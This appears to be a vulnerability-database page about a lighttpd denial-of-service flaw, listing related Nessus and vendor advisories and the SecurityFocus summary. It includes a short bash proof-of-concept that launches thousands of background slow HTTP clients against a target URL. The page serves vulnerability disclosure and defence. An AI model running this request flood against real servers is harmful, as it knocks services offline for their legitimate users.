The 'lighttpd' webserver is vulnerable to a denial-of-service attack due to slow request handling
Reporter | Title | Published | Views | Family All 41 |
---|---|---|---|---|
Tenable Nessus | GLSA-201006-17 : lighttpd: Denial of Service | 4 Jun 201000:00 | β | nessus |
Tenable Nessus | Fedora 12 : lighttpd-1.4.26-2.fc12 (2010-7643) | 1 Jul 201000:00 | β | nessus |
Tenable Nessus | lighttpd < 1.4.26 or 1.5.0 Denial of Service | 6 Feb 201800:00 | β | nessus |
Tenable Nessus | Fedora 13 : lighttpd-1.4.26-2.fc13 (2010-7611) | 1 Jul 201000:00 | β | nessus |
Tenable Nessus | Fedora 11 : lighttpd-1.4.26-2.fc11 (2010-7636) | 1 Jul 201000:00 | β | nessus |
Tenable Nessus | Debian DSA-1987-1 : lighttpd - denial of service | 24 Feb 201000:00 | β | nessus |
Tenable Nessus | openSUSE Security Update : lighttpd (lighttpd-1914) | 9 Feb 201000:00 | β | nessus |
Tenable Nessus | FreeBSD : lighttpd -- denial of service vulnerability (1a3bd81f-1b25-11df-bd1a-002170daae37) | 17 Feb 201000:00 | β | nessus |
Tenable Nessus | openSUSE Security Update : lighttpd (lighttpd-1914) | 9 Feb 201000:00 | β | nessus |
Tenable Nessus | openSUSE Security Update : lighttpd (lighttpd-1914) | 9 Feb 201000:00 | β | nessus |
source: https://www.securityfocus.com/bid/38036/info
The 'lighttpd' webserver is prone to a denial-of-service vulnerability.
Remote attackers can exploit this issue to cause the application to hang, denying service to legitimate users.
##slow_test.sh
for ((j=0;j<1000;j++)) do
for ((i=0; i<50; i++)) do
## slow_client is a C program which sends a HTTP request very slowly
./slow_client http://www.example.com/>/dev/null 2>/dev/null &
done&
sleep 3
done
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo